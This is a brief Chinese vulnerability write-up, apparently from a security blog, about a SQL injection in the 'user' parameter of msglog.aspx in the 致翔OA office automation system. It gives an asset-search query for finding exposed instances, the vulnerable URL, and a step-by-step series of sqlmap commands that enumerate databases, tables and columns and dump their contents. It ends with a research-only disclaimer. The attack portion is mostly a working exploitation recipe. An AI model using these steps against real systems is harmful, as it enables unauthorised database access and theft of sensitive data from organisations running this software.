致翔OA msglog.aspx SQL注入漏洞
漏洞描述
致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息
漏洞影响
致翔OA
网络测绘
app="致翔软件-致翔OA"
漏洞复现
存在漏洞的文件为 msglog.aspx
,涉及注入的参数为 user
/mainpage/msglog.aspx?user=1
python3 sqlmap.py -u http://xx.xx.xx/mainpage/msglog.aspx?user=1
python3 sqlmap.py -u URL --dbs #爆库名
python3 sqlmap.py -u URL -D 数据库名称 --tables #爆表名
python3 sqlmap.py -u URL -D 数据库名称 -T 表名称 --columns #爆表字段名
python3 sqlmap.py -u URL -D 数据库名称 -T 表名称 -C 字段名 --dump #爆字段内容
注:本尘埃の客栈所有文章均为技术分享,用于研究和复现漏洞,请勿非法用于其他用途,否则后果自负!